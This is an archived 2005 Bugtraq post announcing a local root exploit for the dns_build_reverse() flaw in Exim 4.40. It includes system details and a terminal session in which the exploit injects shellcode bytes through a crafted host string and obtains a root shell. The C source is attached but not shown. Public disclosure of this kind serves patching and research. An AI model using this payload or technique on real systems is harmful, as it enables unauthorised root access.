lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <42932f4d.2d.4445.4572@internode.on.net>
Date: Tue, 24 May 2005 23:12:37 +0950
From: "plugger" <plug@...ernode.on.net>
To: bugtraq@...urityfocus.com
Subject: exim 4.40 exploit

hello punters,

i was bored last night so I coded up a local exploit of the
dns_build_reverse() vulnerability in exim 4.40. hope noone
minds as it was disclosed 5 months ago.
tested on exim 4.40 default build with runtime user as root
rather than exim or mail - hence the rootshell. see below
for versions and system details. "exploit" attached.

regards
plug

============
the details
============

plug@bug:~$ uname -a
Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686
GNU/Linux
plug@bug:~$ /usr/exim/bin/exim -bV
Exim version 4.40 #1 built 23-May-2005 22:31:34
Copyright (c) University of Cambridge 2004
Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52:
(December  3, 2003)
Support for: iconv()
Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm
dbmnz
Authenticators:
Routers: accept dnslookup ipliteral manualroute queryprogram
redirect
Transports: appendfile autoreply pipe smtp
Fixed never_users: 0
Configuration file is /usr/exim/configure
plug@bug:~$ 
plug@bug:~$ 
plug@bug:~$ ./exim-exploit 
Firing up exim - cross your fingers for shell!

**** SMTP testing session as if from host
::%A:::::::::::::::::1ÀFF  V
                                                            
      ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
**** but without any ident (RFC 1413) callback.             
       ó
**** This is not for real!

>>> host in host_lookup? yes (matched "*")
>>> looking up host name for ::%A:::::::::::::::::1ÀFF  V
                                                      °
NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
>>> IP address lookup using gethostbyaddr()            ó
>>> IP address lookup failed: h_errno=1
LOG: no host name found for IP address
::%A:::::::::::::::::1ÀFF  V
                                                            
   ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
sh-2.05b#                                                   
    ó
sh-2.05b# 
sh-2.05b# 
sh-2.05b# whoami
root
sh-2.05b# 
sh-2.05b# exit
exit
plug@bug:~$

Download attachment "exim-exploit.c" of type "application/octet-stream" (2647 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ